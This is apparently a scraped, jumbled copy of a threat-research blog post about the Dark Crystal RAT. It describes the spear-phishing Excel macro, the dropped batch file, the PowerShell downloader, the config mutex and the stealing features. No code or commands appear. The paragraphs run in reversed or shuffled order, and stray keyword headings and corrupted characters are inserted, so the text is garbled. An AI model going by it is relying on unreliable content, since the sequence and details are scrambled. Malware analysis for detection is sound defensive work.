If initial beaconing and C2 does not send back data, it will terminate its process.
Splunk base64 decode download#
Figure 2 shows the decoded and decompressed value of its configuration data.įrom Figure 2, we can see the mutex name of this malware sample, "DCR_MUTEX-PNY1ZVhO2iPJoDxTnEBp", and the set of features enabled include “screenshot”, “telegram”, “clipboard”, “sysinfo”.Īfterwards, it will decompress and decode another set of encoded data which is 2 url links that will be used for download and beaconing communication to its C2. This configuration will dictate what mutex and DCRat features are enabled in this compiled DCRat malware. Initial ConfigurationĭCRat will decode and decompress its configuration data embedded in the binary. As RAT malware, it has several capabilities to collect data, steal information or even execute post exploitation payload and plugins.īelow are some notable behaviors of this RAT malware we found during our analysis. NET compiled assembly that leverages multithreading to execute its malicious actions concurrently on a compromised host.
Splunk base64 decode code#
This script will execute an embedded Powershell script that downloads the second stage payload responsible for downloading and executing the actual DCRAT malware on the compromised host.įigure 1.1 and 1.2 show the macro code and the content of the batch script which is a base64 encoded PowerShell script downloader. Spear Phishingīased on the CERT-UA initial threat report, the Dark Crystal RAT infection chain starts when victims are tricked into opening a malicious Microsoft Excel “.xls” office document containing macro code that will drop and execute a batch script named “c:\user\public\new.bat”. powershell, python, batch script) to analyze the malware behavior and extract TTPs that will help the STRT to generate dataset for detections development and testing. tools like Dnspy and scripting tools (e.g. The payload is delivered by spear phishing emails in the first stages of the attacks.įor this blog, we look for DCRAT campaign samples that we can analyze and test in Splunk Attack Range Environment with installed R.E. This RAT has been identified in campaigns targeting Ukraine organizations as reported by CERT-UA. One example is the Dark Crystal RAT (DCRat) that is capable of remote access, post exploitation and data exfiltration.ĭCRat is one of the underground commercial RAT tools used by several threat groups to attack networks and businesses ( 1) ( 2). Remote Access Trojans (RATs) are one of the most common tools used by threat actors as a malicious payload to attack targeted hosts and steal information. The Splunk Threat Research Team (STRT) analyzed and developed Splunk analytics for this RAT to help defenders identify signs of compromise within their networks.
0 kommentar(er)
